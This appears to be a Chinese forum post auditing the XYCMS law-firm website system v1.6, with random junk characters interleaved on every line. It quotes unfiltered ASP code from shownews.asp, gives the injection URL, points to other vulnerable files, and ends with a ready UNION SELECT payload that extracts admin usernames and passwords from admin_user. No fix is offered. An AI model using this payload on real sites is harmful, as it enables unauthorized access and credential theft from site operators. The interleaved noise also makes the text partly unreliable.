前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似2 r* [% I- E0 l) X
: e* S ~9 @2 _1 ?# R' O淫荡分割线
4 W: m0 V& B# m K, r- P g--------------------------------------------------------0 n% b8 D. q. @3 q0 p
0 D/ k8 l+ m6 E; W$ V( C审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
; ?/ @3 @- P3 V( j# L4 I6 I1 a+ _源码地址:http://down.chinaz.com/soft/29233.htm3 [* ~" ~- s$ y4 v1 r I5 Y! [
2 w9 c4 D$ o" r, p! r漏洞文件:shownews.asp: B/ Q$ d; o- m }9 e
漏洞代码:7-13行
' v/ K& o6 f8 q * N- d2 o, q7 p$ s4 ]
; j, T' _3 t0 Z" ~+ J. T Z. R# N
<%
3 f, {3 w2 w. Aid=request.QueryString("id")! n* i# |8 _/ A1 d: U, ?
( {: i, A9 f2 }5 z- h6 Q. t, `3 L
set snews=server.createobject("adodb.recordset")
+ A6 w0 Y2 r* c! r) o5 [/ vexec="select * from [news] where id="&id" R b! P$ d+ e7 f
snews.open exec,conn,1,1
1 d+ O$ F; v- p4 ~ u%>
5 s! g0 P6 y/ a* n0 M$ D 1 a% \3 v7 n% m
G$ G) f {9 o- o什么过滤都没有 直造成注入7 S+ O2 D1 A6 I, N% Y" X
% I* m) V9 v5 s G: q6 S l% G注入点:http://127.0.0.1:99/shownews.asp?id=xx& D: k- [7 z4 \* ^. e5 e0 Q% q, Q
- x% x8 c% }# d: }4 X其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找* p0 z+ X& a& H/ Y4 G
+ J# P6 U5 j' ~- m
: w2 r4 [' u) I# c: O5 {+ F% e/ L8 ^0 `
exp: union select 1,admin,password,4,5,7 from admin_user
& H& o6 B) h% m7 H8 X! ?
" G. `) X; z( M. T |